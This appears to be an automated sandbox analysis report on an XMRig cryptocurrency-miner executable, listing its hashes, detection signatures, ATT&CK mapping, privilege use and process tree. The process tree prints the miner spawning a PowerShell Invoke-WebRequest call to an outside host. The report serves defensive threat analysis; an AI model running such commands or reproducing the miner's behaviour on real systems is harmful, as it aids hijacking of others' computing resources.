xmrig | 0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78

General

Target

0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
Size

1.6MB
MD5

6e8973edb75ebc2a257a752f858661a7
SHA1

4aa5fb5f5211bb1d0598154bc5d447c526f8a435
SHA256

0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78
SHA512

1ee2e74fc76dda6f2bba679069e781466ed62a0a58d4432580997bf678e39e7f1597c718fa0c00bce156fefef55e9c909220414cdf879653cf3dd73552a76e96
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pXHqJ:NABm

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/1048-13-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-14-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-15-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-17-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-18-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-19-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-20-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-21-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-22-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-23-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig
behavioral1/memory/1048-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
928	powershell.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1048-0-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-13-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-14-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-15-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-17-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-18-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-19-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-20-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-21-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-22-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-23-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx
behavioral1/memory/1048-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp	upx

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1048	0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
Token: SeLockMemoryPrivilege	1048	0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
Token: SeDebugPrivilege	928	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 928	1048	0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe	30
PID 1048 wrote to memory of 928	1048	0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe	30
PID 1048 wrote to memory of 928	1048	0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe	30

C:\Users\Admin\AppData\Local\Temp\0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe
"C:\Users\Admin\AppData\Local\Temp\0423b5659ad0aff940aef3530d3dc41d9c11eb7565e57348f939d98c04e77e78.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/928-11-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/928-12-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/928-6-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download
memory/928-7-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/928-8-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/928-10-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/928-9-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/1048-14-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-18-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-13-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-0-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-15-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-17-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-1-0x00000000000F0000-0x0000000000100000-memory.dmp

Filesize
64KB

Download
memory/1048-19-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-20-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-21-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-22-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-23-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download
memory/1048-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

Filesize
3.9MB

Download

Analysis

Sharing